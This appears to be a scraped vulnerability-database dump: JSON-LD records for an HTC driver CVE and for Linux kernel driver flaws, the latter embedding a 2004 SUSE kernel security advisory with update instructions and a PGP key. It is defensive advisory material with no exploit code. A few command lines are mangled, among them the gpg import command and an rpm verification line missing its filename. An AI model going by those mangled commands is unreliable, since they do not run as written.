      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0445"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/96054"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0445"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0445"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0445"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0445"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0445"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0445"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0445"
      },
      {
        "date": "2017-02-06T00:00:00",
        "db": "BID",
        "id": "96054"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "date": "2017-02-08T15:59:01.833000",
        "db": "NVD",
        "id": "CVE-2017-0445"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-15T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0445"
      },
      {
        "date": "2017-03-07T04:01:00",
        "db": "BID",
        "id": "96054"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0445"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "HTC Elevated privilege vulnerability in touch screen driver",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ],
    "trust": 0.6
  }
}

var-200408-0118
Vulnerability from variot

Multiple unknown vulnerabilities in Linux kernel 2.4 and 2.6 allow local users to gain privileges or access kernel memory, as found by the Sparse source code checking tool. The Linux kernel is reported prone to multiple device-driver issues. These issues were found during a recent audit of the Linux kernel source. Local attackers can exploit these vulnerabilities to elevate privileges or conduct denial-of-service attacks on the system. The affected device drivers are: aironet, asus_acpi, decnet, mpu401, msnd, and pss. -----BEGIN PGP SIGNED MESSAGE-----


                    SUSE Security Announcement

    Package:                kernel
    Announcement-ID:        SUSE-SA:2004:020
    Date:                   Tuesday, Jul 2nd 2004 18:00 MEST
    Affected products:      8.0, 8.1, 8.2, 9.0, 9.1
                            SUSE Linux Database Server,
                            SUSE eMail Server III, 3.1
                            SUSE Linux Enterprise Server 7, 8
                            SUSE Linux Firewall on CD/Admin host
                            SUSE Linux Connectivity Server
                            SUSE Linux Office Server
    Vulnerability Type:     local privilege escalation
    Severity (1-10):        6
    SUSE default package:   yes
    Cross References:   CAN-2004-0495
            CAN-2004-0496
            CAN-2004-0497
            CAN-2004-0535
            CAN-2004-0626


Content of this advisory:
    1) security vulnerability resolved:
    - chown: users can change the group affiliation of arbitrary
      files to the group they belong to
    - missing DAC check in chown(2): local privilege escalation
        - overflow with signals: local denial-of-service
        - pss, mpu401 sound driver: read/write to complete memory
        - airo driver: read/write to complete memory
        - ALSA: copy_from_user/copy_to_user confused
        - acpi_asus: read from random memory
        - decnet: write to memory without checking
        - e1000 driver: read complete memory
       problem description, discussion, solution and upgrade information
    2) pending vulnerabilities, solutions, workarounds:
    - icecast
            - sitecopy
            - cadaver
            - OpenOffice_org
            - tripwire
            - postgresql*
            - mod_proxy
    - freeswan
    - ipsec-tools
    - less
    - libpng
    - pavuk
    - XFree86*
    - kdebase3
    3) standard appendix (further information)

1) problem description, brief discussion, solution, upgrade information

Multiple security vulnerabilities are being addressed with this security
update of the Linux kernel.

Kernel memory access vulnerabilities are fixed in the e1000, decnet, 
acpi_asus, alsa, airo/WLAN, pss and mpu401 drivers. These 
vulnerabilities can lead to kernel memory read access, write access 
and local denial of service conditions, resulting in access to the 
root account for an attacker with a local account on the affected 
system.

Missing Discretionary Access Control (DAC) checks in the chown(2) system
call allow an attacker with a local account to change the group
ownership of arbitrary files, which leads to root privileges on affected
systems. An interesting variant of the missing 
checks is that the ownership of files in the /proc filesystem can be 
altered, while the changed ownership still does not allow the files to 
be accessed as a non-root user for to be able to exploit the 
vulnerability. Systems that are based on a version 2.4 kernel are not 
vulnerable to the /proc weakness, and exploitation of the weakness 
requires the use of the kernel NFS server (knfsd). If the knfsd NFS 
server is not activated (it is off by default), the vulnerability is 
not exposed.

The only network-related vulnerability fixed with the kernel updates
that are subject to this announcement affect the SUSE Linux 9.1 
distribution only, as it is based on a 2.6 kernel. Found and reported 
to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability 
allows a remote attacker to send a specially crafted TCP packet to a 
vulnerable system, causing that system to stall if it makes use of 
TCP option matching netfilter rules.

In some rare configurations of the SUSE Linux 9.1 distribution, some 
users have experienced stalling systems during system startup. These 
problems are fixed with this kernel update.



SPECIAL INSTALL INSTRUCTIONS:
==============================
For the impatient: Run YOU (Yast2 Online Update, command 
"yast2 online_update" as root) to install the updates (semi) 
automatically, if you have a SUSE Linux 8.1 and newer system.

For those who wish to install their kernel updates manually and for 
those who use a SUSE Linux 8.0 system:

The following paragraphs will guide you through the installation
process in a step-by-step fashion. The character sequence "****"
marks the beginning of a new paragraph. In some cases, the steps
outlined in a particular paragraph may or may not be applicable
to your situation. 
Therefore, please make sure to read through all of the steps below
before attempting any of these procedures. 
All of the commands that need to be executed are required to be
run as the superuser (root). Each step relies on the steps before
it to complete successfully.

**** Step 1: Determine the needed kernel type

Please use the following command to find the kernel type that is
installed on your system:

  rpm -qf /boot/vmlinuz

Following are the possible kernel types (disregard the version and
build number following the name separated by the "-" character)

  k_deflt   # default kernel, good for most systems. 
  k_i386    # kernel for older processors and chipsets
  k_athlon  # kernel made specifically for AMD Athlon(tm) family processors
  k_psmp    # kernel for Pentium-I dual processor systems
  k_smp     # kernel for SMP systems (Pentium-II and above)
  k_smp4G   # kernel for SMP systems which supports a maximum of 4G of RAM
  kernel-64k-pagesize
  kernel-bigsmp
  kernel-default
  kernel-smp

**** Step 2: Download the package for your system

Please download the kernel RPM package for your distribution with the
name as indicated by Step 1. The list of all kernel rpm packages is
appended below. Note: The kernel-source package does not
contain a binary kernel in bootable form. Instead, it contains the
sources that the binary kernel rpm packages are created from. It can be
used by administrators who have decided to build their own kernel. 
Since the kernel-source.rpm is an installable (compiled) package that
contains sources for the linux kernel, it is not the source RPM for
the kernel RPM binary packages.

The kernel RPM binary packages for the distributions can be found at the
locations below ftp://ftp.suse.com/pub/suse/i386/update/.

  8.0/images/
  8.1/rpm/i586
  8.2/rpm/i586
  9.0/rpm/i586
  9.1/rpm/i586

After downloading the kernel RPM package for your system, you should
verify the authenticity of the kernel rpm package using the methods as
listed in section 3) of each SUSE Security Announcement.

**** Step 3: Installing your kernel rpm package

Install the rpm package that you have downloaded in Steps 3 or 4 with
the command
    rpm -Uhv --nodeps --force <K_FILE.RPM>
where <K_FILE.RPM> is the name of the rpm package that you downloaded.

Warning: After performing this step, your system will likely not be
         able to boot if the following steps have not been fully
         followed.


If you run SUSE LINUX 8.1 and haven't applied the kernel update
(SUSE-SA:2003:034), AND you are using the freeswan package, you also
need to update the freeswan rpm as a dependency as offered
by YOU (YaST Online Update). The package can be downloaded from
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/

**** Step 4: configuring and creating the initrd

The initrd is a ramdisk that is loaded into the memory of your
system together with the kernel boot image by the bootloader. The
kernel uses the content of this ramdisk to execute commands that must
be run before the kernel can mount its actual root filesystem. It is
usually used to initialize SCSI drivers or NIC drivers for diskless
operation.

The variable INITRD_MODULES in /etc/sysconfig/kernel determines
which kernel modules will be loaded in the initrd before the kernel
has mounted its actual root filesystem. The variable should contain
your SCSI adapter (if any) or filesystem driver modules.

With the installation of the new kernel, the initrd has to be
re-packed with the update kernel modules. Please run the command

  mk_initrd

as root to create a new init ramdisk (initrd) for your system. 
On SuSE Linux 8.1 and later, this is done automatically when the
RPM is installed.

**** Step 5: bootloader

If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there
are two options:
Depending on your software configuration, you have either the lilo
bootloader or the grub bootloader installed and initialized on your
system. 
The grub bootloader does not require any further actions to be
performed after the new kernel images have been moved in place by the
rpm Update command. 
If you have a lilo bootloader installed and initialized, then the lilo
program must be run as root. Use the command

  grep LOADER_TYPE /etc/sysconfig/bootloader

to find out which boot loader is configured. If it is lilo, then you
must run the lilo command as root. If grub is listed, then your system
does not require any bootloader initialization.

Warning: An improperly installed bootloader may render your system
         unbootable.

**** Step 6: reboot

If all of the steps above have been successfully completed on your
system, then the new kernel including the kernel modules and the
initrd should be ready to boot. The system needs to be rebooted for
the changes to become active. Please make sure that all steps have
completed, then reboot using the command
    shutdown -r now
or
    init 6

Your system should now shut down and reboot with the new kernel.


There is no workaround known.


Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement. 
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update. 
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web. Update packages will be available soon.

- sitecopy
The sitecopy package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.

- cadaver
The cadaver package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.

- OpenOffice_org
The OpenOffice_org package includes a vulnerable version
of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages
will be available soon.

- tripwire
A format string bug in tripwire can be exploited locally
to gain root permissions. 
New packages are available.

- postgresql
A buffer overflow in psqlODBC could be exploited to crash the
application using it. E.g. a PHP script that uses ODBC to access a
PostgreSQL database can be utilized to crash the surrounding Apache
web-server. Other parts of PostgreSQL are not affected. 
New packages are available.

- XDM/XFree86
This update resolves random listening to ports by XDM
that allows to connect via the XDMCP. SUSE LINUX 9.1
is affected only. 
New packages are available.

- mod_proxy
A buffer overflow can be triggered by malicious remote
servers that return a negative Content-Length value. 
This vulnerability can be used to execute commands remotely
New packages are available.

- freeswan
A bug in the certificate chain authentication code could allow an
attacker to authenticate any host against a FreeS/WAN server by
presenting specially crafted certificates wrapped in a PKCS#7 file. 
The packages are currently being tested and will be available soon.

- ipsec-tools
The racoon daemon which is responsible for handling IKE messages
fails to reject invalid or self-signed X.509 certificates which
allows for man-in-the-middle attacks on IPsec tunnels established
via racoon. 
The packages are currently being tested and will be available soon.

- less
This update fixes a possible symlink attack in lessopen.sh. The
attack can be executed by local users to overwrite arbitrary files
with the privileges of the user running less. 
New packages are available.

- libpng
This update adds a missing fix for CAN-2002-1363. 
New packages are available.

- pavuk
This update fixes a remotely exploitable buffer overflow in pavuk. 
Thanks to Ulf Harnhammar for reporting this to us. 
New packages are available.

- kdebase3
This update fixes a possible attack on tmp files created at the
first login of a user using KDE or at the first time running a
KDE application. This bug can be exploited locally to overwrite
arbitrary files with the privilege of the victim user. 
Just affects SUSE LINUX 9.1
New packages are available.

3) standard appendix: authenticity verification, additional information

  • Package authenticity verification:

    SUSE update packages are available on many mirror ftp servers around the world. While this service is considered valuable and important to the free and open source software community, many users wish to be certain as to be the origin of the package and its content before installing the package. There are two independent verification methods that can be used to prove the authenticity of a downloaded file or rpm package: 1) md5sums as provided in the (cryptographically signed) announcement. 2) using the internal gpg signatures of the rpm package.

    1) execute the command md5sum after you have downloaded the file from a SUSE ftp server or its mirrors. Then, compare the resulting md5sum with the one that is listed in the announcement. Since the announcement containing the checksums is cryptographically signed (usually using the key security@suse.de), the checksums offer proof of the authenticity of the package. We recommend against subscribing to security lists which cause the email message containing the announcement to be modified so that the signature does not match after transport through the mailing list software. Downsides: You must be able to verify the authenticity of the announcement in the first place. If RPM packages are being rebuilt and a new version of a package is published on the ftp server, all md5 sums for the files are useless.

    2) rpm package signatures provide an easy way to verify the authenticity of an rpm package. Use the command rpm -v --checksig to verify the signature of the package, where is the filename of the rpm package that you have downloaded. Of course, package authenticity verification can only target an un-installed rpm package file. Prerequisites: a) gpg is installed b) The package is signed using a certain key. The public part of this key must be installed by the gpg program in the directory ~/.gnupg/ under the user's home directory who performs the signature verification (usually root). You can import the key that is used by SUSE in rpm packages for SUSE Linux by saving this announcement to a file ("announcement.txt") and running the command (do "su -" to be root): gpg --batch; gpg < announcement.txt | gpg --import SUSE Linux distributions version 7.1 and thereafter install the key "build@suse.de" upon installation or upgrade, provided that the package gpg is installed. The file containing the public key is placed at the top-level directory of the first CD (pubring.gpg) and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .

  • SUSE runs two security mailing lists to which any interested party may subscribe:

    suse-security@suse.com - general/linux/SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an email to suse-security-subscribe@suse.com.

    suse-security-announce@suse.com - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an email to suse-security-announce-subscribe@suse.com.

    For general information or the frequently asked questions (faq) send mail to: suse-security-info@suse.com or suse-security-faq@suse.com respectively.

    ===================================================================== SUSE's security contact is security@suse.com or security@suse.de. The security@suse.de public key is listed below. =====================================================================


    The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, it is desired that the clear-text signature must show proof of the authenticity of the text. SUSE Linux AG makes no warranties of any kind whatsoever with respect to the information contained in this security advisory.

Type Bits/KeyID Date User ID pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team security@suse.de pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key build@suse.de

-----BEGIN PGP PUBLIC KEY BLOCK-----

Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org

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 DgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE= =LRKC - -----END PGP PUBLIC KEY BLOCK-----


  • - | Roman Drahtm\xfcller draht@suse.de // "You don't need eyes to see, | SUSE Linux AG - Security Phone: // you need vision!" | N\xfcrnberg, Germany +49-911-740530 // Maxi Jazz, Faithless |
  • - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux)

iQEVAwUBQOWPL3ey5gA9JdPZAQFFzQf+Mo5WmO40BDHakn4qD5rAcfU6H/0rhMpy Bi8r+g6GoSp/m2Zy+1O0Qn3jVb/iirVlnHH3DND1r/GunM3c5CTaMYt2Bt7PTOdt OsjD41lbiFlHDmmmaodROQvcrz7T67YU0gCtSKJdDfs2ATiiUOcyUQZNfi/PiEqD jwmKpP5c1NXSXPSwZ2f430itJA5iUqqVBeB1WHn63kOnIKtHBJ9c6uw3rZ99t1OA iud3L+VQSycb8xQSlOsuiaYW1S236VsogKWRbqY76eo7E2AnVQlMpcZkyW91/vfT WntQlZJAaGFX1q/IyGy+PGFPUoJjNc7H6jy5ZqJqXR5Sb0KrHfadCQ== =24bz -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200408-0118",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "conectiva",
        "version": "9.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "conectiva",
        "version": "8.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "suse",
        "version": "8.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "suse",
        "version": "8.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "gentoo",
        "version": "1.4"
      },
      {
        "model": "converged communications server",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "email server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "3.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "7"
      },
      {
        "model": "linux firewall cd",
        "scope": "eq",
        "trust": 1.0,
